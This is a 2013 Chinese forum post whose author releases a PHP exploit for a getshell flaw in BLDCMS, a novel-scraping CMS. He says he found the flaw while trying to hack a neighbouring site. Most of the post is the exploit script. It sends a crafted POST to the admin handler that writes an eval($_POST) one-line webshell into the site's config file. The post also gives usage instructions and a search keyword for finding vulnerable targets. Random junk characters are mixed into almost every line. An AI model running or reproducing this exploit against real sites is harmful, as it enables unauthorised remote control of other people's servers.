之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
: a/ E B% g) q4 s; `' h; s5 O: r. j! C& T7 m) ~( d
7 N% W* q+ Y0 c+ o话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 # N6 n0 }0 W3 {6 f
$ v; d2 o2 g- p7 Y `$ \9 o既然都有人发了 我就把我之前写好的EXP放出来吧( ~# X7 b/ K# f# Q
% n4 `5 d- q+ w& ^1 ~view source print?01.php;">
4 r2 Y' q# @3 k4 j+ {9 n1 ]02.<!--?php/ }: j8 w% H$ ~' ?, e+ c
03.echo "-------------------------------------------------------------------) G: V* r; `) z8 V, ]. l
04. % `- \0 T) u" n, y/ g) s( }
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP& s) }# S/ v6 f- b4 F( v W7 ~ [: \
06. 6 m" A+ F/ ^: |3 _" n1 D ~+ e1 d2 i
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun5 O; B7 c8 X* ]% Y: b
08. 6 `% W* W; D; Q- T
09.QQ:981009941\r\n 2013.3.21\r\n
; t# G. |* L1 T: j% W3 @. b9 T1 c10.
4 X$ N$ t/ w, P6 Z11.
% J( m0 I* X& F# P0 F1 V9 U" L12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
Z* ~, u6 P" N- w! a* ]13. - z8 w2 w; E+ x& B. l
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 y4 \$ l c9 M- c0 d& { e! k0 z15. . y& ?6 R# y. s- Y% N
16.--------------------------------------------------------------------\r\n";
: i3 s' n7 s3 I" p8 P( \0 S# ]' ^17.$url=$argv[1];
) Q( a! x5 z; v T3 ?18.$dir=$argv[2];
: s( d2 Q. b6 E. b7 E8 i19.$pass=$argv[3];
9 n: O) {& r, O20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
7 v7 Z& o8 F# b( }$ X4 X" p21.if (emptyempty($pass)||emptyempty($url))# z! k6 t5 f3 z" A7 r3 I
22.{exit("请输入参数");}
7 [$ K, Y; W+ H# M23.else7 @# X3 Q/ t5 S8 m/ h4 @- ~4 ~) f
24.{; l3 i* F/ s( |# ^7 V Q
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev) _6 e$ ~5 t5 ?( ~6 m( o4 Y
26. + A/ K- K2 u* { m0 `
27.al;
% W" K# m* }( n9 p4 P6 T. v28.$length = strlen($fuckdata);
' u* C* n3 e: v ^1 T6 K29.function getshell($url,$pass)1 k( W2 ~0 U& x1 n |! P
30.{2 ~* ]: U6 m% `
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
' G: F# G9 k4 e32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";7 K: ?6 d5 C( O# @* ]6 Y! R: F
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
6 Y1 p, @' [ c c34.$header .= "User-Agent: MSIE\r\n";
9 H" j/ P+ V: w9 U35.$header .= "Host:".$url."\r\n";6 [, s3 l, F3 s% T$ k1 u
36.$header .= "Content-Length: ".$length."\r\n";
7 ]: s5 h0 d% K% m; `37.$header .= "Connection: Close\r\n";
3 ]% M. D/ r& r7 X% K+ Z0 o0 Y38.$header .="\r\n";$ s. l9 h) O9 N- R$ j+ @
39.$header .= $fuckdata."\r\n\r\n";
6 k& r! o7 q( U: m* [40.$fp = fsockopen($url, 80,$errno,$errstr,15);! N0 g6 N6 ?/ L' q; ]
41.if (!$fp)" U9 S. x, Y; _4 h
42.{& S% p: j+ U% E& \
43.exit ("利用失败:请检查指定目标是否能正常打开");
. D7 L" ^+ N( p- x: Z) G; G44.}: ~! V' Q% ^. v
45.else{ if (!fputs($fp,$header))
9 o6 C, g! M6 u3 j. P( `, D46.{exit ("利用失败");}
A/ ~6 \: y6 \* k47.else+ T b% X3 L# ?0 N% n& ^
48.{
0 ^$ O+ ^8 N3 P3 X& ]" B; C49.$receive = '';
7 K7 w8 i) o4 U50.while (!feof($fp)) {
; t3 D* x2 Z4 G2 ?+ l3 D2 n51.$receive .= @fgets($fp, 1000);0 y; \4 X$ ]+ u' C( S, }9 |8 d
52.}
! f! o& H1 W N& y53.@fclose($fp);5 P) P: M/ x# e9 [, {9 v" r( [
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
7 l. v. A# a, b, o3 o' B. v! j55. 0 r6 R2 q# B% C4 o
56.GPC是否=off)";
0 e+ E& l3 w3 H. i5 W/ K: M# a57.}}$ R; H/ @$ Z9 G0 C' d- A. g. A
58.}
) ~4 D( U( M) H! J. g59.}
& u4 O! n6 l3 G1 a5 g60.getshell($url,$pass);5 H9 O' I6 Z4 B1 i+ d
61.?-->
0 x5 c2 m) j2 d( L6 S" w: U
S6 r' K- l1 W( O
2 Q1 Q% |' D' o1 y5 l, M4 N. P * R5 Z& v" j! J2 n" ]2 E: d
by 数据流
2 q( q3 c! D, Z; ]5 w |
发表于 2013-3-26 20:49:10
收藏
支持
反对